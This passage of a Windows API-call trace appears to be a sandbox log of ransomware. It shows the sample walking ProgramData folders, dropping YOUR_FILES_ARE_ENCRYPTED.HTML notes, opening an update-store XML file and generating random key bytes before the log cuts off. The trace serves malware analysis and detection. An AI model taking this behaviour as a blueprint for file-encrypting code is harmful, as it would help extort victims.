Licensing Component.swidtag") returned=".swidtag" [0109.653] lstrlenW (lpString=".swidtag") returned 8 [0109.653] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned=".swidtag" [0109.653] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0x6121cfc7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", cAlternateFileName="REGID1~3.SWI")) returned 1 [0109.653] StrStrIW (lpFirst="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.653] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned 128 [0109.653] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned=".swidtag" [0109.653] lstrlenW (lpString=".swidtag") returned 8 [0109.653] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned=".swidtag" [0109.653] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ac00f7d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3ac00f7d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3ac00f7d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e6, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", cAlternateFileName="")) returned 1 [0109.653] StrStrIW (lpFirst="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.653] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag") returned 97 [0109.653] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag") returned=".swidtag" [0109.653] lstrlenW (lpString=".swidtag") returned 8 [0109.653] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag") returned=".swidtag" [0109.654] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ac00f7d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3ac00f7d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3ac00f7d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e6, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", cAlternateFileName="")) returned 0 [0109.654] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.654] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0109.654] GetProcessHeap () returned 0x600000 [0109.654] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6994a0 [0109.656] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0109.657] WriteFile (in: hFile=0x300, lpBuffer=0x6994a0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x6994a0*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0109.658] CloseHandle (hObject=0x300) returned 1 [0109.659] GetProcessHeap () returned 0x600000 [0109.659] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6994a0 | out: hHeap=0x600000) returned 1 [0109.659] GetProcessHeap () returned 0x600000 [0109.659] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0109.660] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="SoftwareDistribution", cAlternateFileName="SOFTWA~1")) returned 1 [0109.660] StrStrIW (lpFirst="SoftwareDistribution", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.660] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\SoftwareDistribution") returned 39 [0109.660] GetProcessHeap () returned 0x600000 [0109.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0109.661] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\SoftwareDistribution" | out: lpString1="\\\\?\\C:\\ProgramData\\SoftwareDistribution") returned="\\\\?\\C:\\ProgramData\\SoftwareDistribution" [0109.661] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\SoftwareDistribution", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\*") returned="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\*" [0109.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.661] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0109.661] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="PostRebootEventCache.V2", cAlternateFileName="POSTRE~1.V2")) returned 1 [0109.661] StrStrIW (lpFirst="PostRebootEventCache.V2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.661] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\PostRebootEventCache.V2") returned 63 [0109.661] GetProcessHeap () returned 0x600000 [0109.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6994a0 [0109.662] lstrcpyW (in: lpString1=0x6994a0, lpString2="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\PostRebootEventCache.V2" | out: lpString1="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\PostRebootEventCache.V2") returned="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\PostRebootEventCache.V2" [0109.662] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\PostRebootEventCache.V2", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\PostRebootEventCache.V2\\*") returned="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\PostRebootEventCache.V2\\*" [0109.662] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\PostRebootEventCache.V2\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0109.663] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0109.663] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 0 [0109.663] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0109.663] wnsprintfW (in: pszDest=0x6994a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\PostRebootEventCache.V2\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0109.663] GetProcessHeap () returned 0x600000 [0109.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0109.663] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\PostRebootEventCache.V2\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\softwaredistribution\\postrebooteventcache.v2\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0109.664] WriteFile (in: hFile=0x314, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0109.665] CloseHandle (hObject=0x314) returned 1 [0109.665] GetProcessHeap () returned 0x600000 [0109.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0109.665] GetProcessHeap () returned 0x600000 [0109.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6994a0 | out: hHeap=0x600000) returned 1 [0109.666] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="PostRebootEventCache.V2", cAlternateFileName="POSTRE~1.V2")) returned 0 [0109.666] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.666] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0109.666] GetProcessHeap () returned 0x600000 [0109.666] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6994a0 [0109.667] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\SoftwareDistribution\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\softwaredistribution\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0109.667] WriteFile (in: hFile=0x300, lpBuffer=0x6994a0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x6994a0*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0109.668] CloseHandle (hObject=0x300) returned 1 [0109.669] GetProcessHeap () returned 0x600000 [0109.669] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6994a0 | out: hHeap=0x600000) returned 1 [0109.669] GetProcessHeap () returned 0x600000 [0109.669] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0109.670] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0109.670] StrStrIW (lpFirst="Start Menu", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.670] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Start Menu") returned 29 [0109.670] GetProcessHeap () returned 0x600000 [0109.670] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0109.671] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Start Menu" | out: lpString1="\\\\?\\C:\\ProgramData\\Start Menu") returned="\\\\?\\C:\\ProgramData\\Start Menu" [0109.671] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Start Menu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Start Menu\\*") returned="\\\\?\\C:\\ProgramData\\Start Menu\\*" [0109.671] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Start Menu\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="PostRebootEventCache.V2", cAlternateFileName="翿")) returned 0xffffffff [0109.672] GetProcessHeap () returned 0x600000 [0109.672] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0109.672] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0109.672] StrStrIW (lpFirst="Templates", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.672] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Templates") returned 28 [0109.672] GetProcessHeap () returned 0x600000 [0109.672] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0109.673] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Templates" | out: lpString1="\\\\?\\C:\\ProgramData\\Templates") returned="\\\\?\\C:\\ProgramData\\Templates" [0109.673] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Templates\\*") returned="\\\\?\\C:\\ProgramData\\Templates\\*" [0109.673] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Templates\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="PostRebootEventCache.V2", cAlternateFileName="翿")) returned 0xffffffff [0109.673] GetProcessHeap () returned 0x600000 [0109.674] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0109.674] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="USOPrivate", cAlternateFileName="USOPRI~1")) returned 1 [0109.674] StrStrIW (lpFirst="USOPrivate", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.674] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOPrivate") returned 29 [0109.674] GetProcessHeap () returned 0x600000 [0109.674] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0109.674] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\USOPrivate" | out: lpString1="\\\\?\\C:\\ProgramData\\USOPrivate") returned="\\\\?\\C:\\ProgramData\\USOPrivate" [0109.674] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\USOPrivate", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\USOPrivate\\*") returned="\\\\?\\C:\\ProgramData\\USOPrivate\\*" [0109.674] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\USOPrivate\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf99491c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf99491c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.674] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf99491c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf99491c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0109.674] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x9112cfd3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x9112cfd3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="UpdateStore", cAlternateFileName="UPDATE~1")) returned 1 [0109.674] StrStrIW (lpFirst="UpdateStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.674] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore") returned 41 [0109.674] GetProcessHeap () returned 0x600000 [0109.674] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6994a0 [0109.675] lstrcpyW (in: lpString1=0x6994a0, lpString2="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore" | out: lpString1="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore") returned="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore" [0109.675] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore\\*") returned="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore\\*" [0109.675] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x9112cfd3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x9112cfd3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63372c, dwReserved1=0x6336f0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0109.676] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x9112cfd3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x9112cfd3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63372c, dwReserved1=0x6336f0, cFileName="..", cAlternateFileName="")) returned 1 [0109.676] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x9102ec79, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x9112a88a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x349, dwReserved0=0x63372c, dwReserved1=0x6336f0, cFileName="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", cAlternateFileName="UPDATE~1.XML")) returned 1 [0109.676] StrStrIW (lpFirst="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.676] wnsprintfW (in: pszDest=0x6994a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml") returned 93 [0109.676] PathFindExtensionW (pszPath="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml") returned=".xml" [0109.676] lstrlenW (lpString=".xml") returned 4 [0109.676] PathFindExtensionW (pszPath="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml") returned=".xml" [0109.676] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0109.676] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" (normalized: "c:\\programdata\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0109.676] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=841) returned 1 [0109.676] GetProcessHeap () returned 0x600000 [0109.676] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0109.682] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="1A") returned 2 [0109.682] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="71") returned 2 [0109.682] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="0B") returned 2 [0109.682] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="47") returned 2 [0109.682] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="2D") returned 2 [0109.682] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="26") returned 2 [0109.682] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="EA") returned 2 [0109.682] wsprintfW (in: param_1=0x19ed16, 